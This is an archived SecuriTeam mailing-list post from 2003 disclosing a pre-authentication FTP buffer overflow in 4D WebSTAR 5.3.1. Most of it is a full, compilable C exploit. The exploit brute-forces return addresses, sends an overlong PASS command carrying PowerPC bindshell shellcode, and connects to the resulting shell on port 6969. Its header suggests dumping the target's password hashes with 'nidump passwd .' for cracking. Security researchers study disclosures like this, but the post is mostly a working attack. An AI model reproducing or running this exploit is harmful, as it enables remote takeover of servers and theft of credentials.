[EXPL] Remote Vulnerability in 4D WebSTAR Server (Long PASS, PCC Exploit)
From: SecuriTeam (support_at_securiteam.com)
Date: 09/16/03
- Previous message: SecuriTeam: "[TOOL] BofCheck - Buffer Overflow, Environment Variables Overflow and Format String Vulnerabilities Binary Tester"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 16 Sep 2003 17:30:16 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Remote Vulnerability in 4D WebSTAR Server (Long PASS, PCC Exploit)
------------------------------------------------------------------------
SUMMARY
A vulnerability in <http://www.4d.com/products/4dwsv.html> 4D WebSTAR
Server's FTP server allows remote attackers to overflow an internal buffer
causing the product to execute arbitrary code.
DETAILS
Vulnerable systems:
* 4D WebSTAR version 5.3.1
Exploit:
/*
Remote Vulnerability in 4D WebSTAR Server Suite.
================================================
Date: 11.09.2003
Author: B-r00t. 2003.
Email: B-r00t <br00t@blueyonder.co.uk>
Webpage: http://doris.scriptkiddie.net
IRC: doris.scriptkiddie.net:6667 - STD
doris.scriptkiddie.net:6969 - SSL
#cheese & #0day.
Reference: http://www.4d.com/products/webstar.html
Versions: 4D WebSTAR 5.3.1 (Latest) => VULNERABLE.
Tested: 4D WebSTAR 5.3.1 (Trial Version).
Exploit: 4DWS_ftp.c - On success a bindshell is spawned
on port 6969. Although the resulting shell is
UID 'webstart', it is usually possible to
execute 'nidump passwd .' to obtain the system
password hashes for cracking.
Compile: gcc -o 4DWS_ftp 4DWS_ftp.c
Description: There is a pre authentication buffer overflow
that exists in the login mechanism of the WebSTAR
FTP service. See advisory for further details.
Remember Kiddiez ... An Apple A Day ...!!!!
*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <time.h>
#include <netdb.h>
// Defines
#define EXPLOIT "4DWS_ftp"
#define BINDSHELL_PORT 6969
#define FTP_PORT 21
#define MAXSIZE 1024
// Prototypes
int usage (void);
int get_connect (int port, char *host);
int send_sock (char *buff);
int read_sock (char *buff);
int check_bindshell(int port, char *host);
//Variables
int sock, port=21, lsb;
char evilbuff[MAXSIZE], temp[MAXSIZE];
char user[] = "USER 4D4D" "\x0d\x0a";
char retaddy[5], filler[MAXSIZE];
unsigned long int ret, loop;
int main (int argc, char *argv[])
{
char shellcode[] = //PPC forkin bindshell 6969 by B-r00t.2003.
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7d\x68\x02\xa6\x3b\xeb\x01\x70"
"\x39\x80\x01\x70\x3b\xdf\xff\x88\x7c\xbe\x29\xae\x3b\xdf\xff\x89"
"\x7c\xbe\x29\xae\x3b\xdf\xff\x8a\x7c\xbe\x29\xae\x3b\xdf\xff\x8b"
"\x7c\xbe\x29\xae\x38\x6c\xfe\x92\x38\x8c\xfe\x91\x38\xac\xfe\x96"
"\x38\x0c\xfe\xf1\x44\xff\xff\x02\x60\x60\x60\x60\x7c\x67\x1b\x78"
"\x38\x9f\xff\x84\x38\xac\xfe\xa0\x38\x0c\xfe\xf8\x44\xff\xff\x02"
"\x60\x60\x60\x60\x7c\xe3\x3b\x78\x38\x8c\xfe\x91\x38\x0c\xfe\xfa"
"\x44\xff\xff\x02\x60\x60\x60\x60\x7c\xe3\x3b\x78\x38\x8c\xfe\x90"
"\x38\xac\xfe\x90\x38\x0c\xfe\xae\x44\xff\xff\x02\x60\x60\x60\x60"
"\x38\x8c\xfe\x90\x38\x0c\xfe\xea\x44\xff\xff\x02\x60\x60\x60\x60"
"\x38\x8c\xfe\x91\x38\x0c\xfe\xea\x44\xff\xff\x02\x60\x60\x60\x60"
"\x38\x8c\xfe\x92\x38\x0c\xfe\xea\x44\xff\xff\x02\x60\x60\x60\x60"
"\x38\x0c\xfe\x92\x44\xff\xff\x02\x60\x60\x60\x60\x39\x1f\xff\x83"
"\x7c\xa8\x29\xae\x38\x7f\xff\x7c\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x38\x81\xff\xf8\x38\x0c\xfe\xcb\x44\xff\xff\x02\x41\x41\x41\x41"
"\x41\x41\x41\x41\x2f\x62\x69\x6e\x2f\x73\x68\x58\xff\x02\x1b\x39"
"\x41\x41\x41\x41"; // Yu Cant Get This Stuff In Storez Man!!!
char nops[] =
"\x60\x60\x60\x60\x60\x60\x60\x60";
printf ("\n%s by B-r00t <br00t@blueyonder.co.uk>. (c) 2003.\n",
EXPLOIT);
printf ("\nExploits the pre authentication buffer overflow in
the");
printf ("\nWebSTAR 5.3.1 FTP service.");
if (argc < 2)
usage ();
printf ("\nPatience ...\n\n");
memset(filler, '\0', sizeof(filler));
memset(filler, 0x78, 173);
filler[0] = 'P';
filler[1] = 'A';
filler[2] = 'S';
filler[3] = 'S';
filler[4] = 0x20;
for (lsb=0; lsb<9; lsb+=4) {//Increase range if no succcess.
for (loop=0xf018f504+lsb; loop<0xf028f505+lsb; loop+=0x1000)
{
ret=loop;
printf ("\n[0x%x] ", ret);
retaddy[0] = (int)((ret & 0xff000000) >> 24);
retaddy[1] = (int)((ret & 0x00ff0000) >> 16);
retaddy[2] = (int)((ret & 0x0000ff00) >> 8);
retaddy[3] = (int) (ret & 0x000000ff);
retaddy[4] = '\0';
memset(evilbuff, '\0', sizeof(evilbuff));
strcpy (evilbuff, filler);
strcat (evilbuff, retaddy);
strcat (evilbuff, nops);
strcat (evilbuff, shellcode);
strcat (evilbuff, "\x0d\x0a");
if ((sock=socket(AF_INET, SOCK_STREAM, 6)) == -1)
{
perror(" Retrying! ");
loop-=0x1000;
sleep(2);
continue;
}
if (get_connect(FTP_PORT, argv[1]) ==-1)
{
perror(" Retrying! ");
loop-=0x1000;
sleep(2);
close(sock);
continue;
}
read_sock(temp);
send_sock (user);
read_sock(temp);
send_sock (evilbuff);
read_sock(temp);
close(sock);
sleep(3);// Let service respawn!
check_bindshell(BINDSHELL_PORT, argv[1]);
}}
printf("\n\nIf its still up... Go Again!\n\n");
exit(0);
}//End_Main
//Check For Bindshell 6969
int check_bindshell(int port, char *host)
{
fd_set rfds;
int sel=0, rd=0;
char *ptr = temp;
memset(temp, '\0', MAXSIZE);
if((sock=socket(AF_INET, SOCK_STREAM, 6))== -1)
{
perror("Socket Error.");
return -1;
}
if (get_connect(port, host) <0)
{
close (sock);
return -1;
}
else printf (" Yay~!\n\aWo0tWo0t! ... We got a shell on %s!\n\n>",
host);
// Start clean ..
fflush(stdin);
fflush(stdout);
fflush(stderr);
do {
FD_ZERO(&rfds);
FD_SET(0, &rfds);
FD_SET(sock, &rfds);
sel=select(sock+1, &rfds, NULL, NULL, NULL);
memset(temp, '\0', MAXSIZE);
if (sel) {
if(FD_ISSET(sock, &rfds)) {
rd=(read_sock(temp));
printf("%s", temp);
}
if(FD_ISSET(0, &rfds)) {
rd=(read(0, ptr, MAXSIZE-1));
send_sock(temp);
}
}
} while( sel && rd );
close(sock);
printf ("\nShell Aborted!\n");
exit(0);
}
//Do Socket Connect
int get_connect (int port, char *host)
{
struct sockaddr_in dest_addr;
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(port);
if (! inet_aton(host, &(dest_addr.sin_addr)))
return -1;
memset( &(dest_addr.sin_zero), '\0', 8);
if (connect (sock, (struct sockaddr *)&dest_addr, sizeof (struct
sockaddr)) == -1)
{
printf(" Fail!");
close(sock);
return -1;
}
else return 0;
}
//Send Data To Socket
int send_sock (char *buff)
{
int bytes = 0;
bytes = (send (sock, buff, strlen(buff), 0));
if (bytes == -1)
{
perror("Send Error.");
close(sock);
return -1;
}
else return bytes;
}
//Read Data From Socket
int read_sock (char *buff)
{
int bytes = 0;
bytes = (recv (sock, buff, MAXSIZE-1, 0));
if (bytes == -1)
{
perror ("Recv Error.");
close(sock);
return -1;
}
else return bytes;
}
//Usage Message
int usage (void)
{
printf ("\n\nUsage: %s [IP_ADDRESS] ", EXPLOIT);
printf ("\nExample: %s 10.0.0.1 \n\n", EXPLOIT);
exit (-1);
}
/* Shoutz: Haggis For Supplying Pesticide & Patience. */
/* Marshal-l, Rux0r, macavity, Mum & Dad. */
/* The doris.scriptkiddie.net posse! */
/* That One Doris ... U-Know-Who-U-R! */
/* */
/* Dedicated: Sad Apple Slashdot Trollz - 'Now Ya Get iT ?' */
/* THE END - AMEN. */
ADDITIONAL INFORMATION
The information has been provided by <mailto:br00t@blueyonder.co.uk>
B-r00t.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[TOOL] BofCheck - Buffer Overflow, Environment Variables Overflow and Format String Vulnerabilities Binary Tester"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [NEWS] Ventrilo Denial of Service
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Lack of proper packet handling
within Ventrilo allow attackers to crash ... void ventrilo_udp_head_dec(unsigned char
*data) ... void ventrilo_udp_data_dec(unsigned char *data, int len, unsigned short ...
(Securiteam) - [EXPL] qwik-smtpd Format String
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... ** The second problem was "fixed"
using another char and then ... ** calling the int 0x80 syscall. ... void
Usage; ... (Securiteam) - [EXPL] EPIC4 CTCP Nicknames Buffer Overflow
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... void send_mes(int fd,char *host);
... void wait_connection; ... unsigned int check_version = 0; ...
(Securiteam) - [EXPL] mtFTPd Server Format String (Exploit)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... / discovered by darkeagle
- xx.10.04 ... build_un(unsigned int retaddr, unsigned int offset, unsigned int base, ...
main(int argc, char * argv) ... (Securiteam) - [EXPL] Samba "send_mailslot()" Buffer Overflow Vulnerability (Exploit)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... void put_name(char *dest,
const char *name, int pad, unsigned int ... (Securiteam)
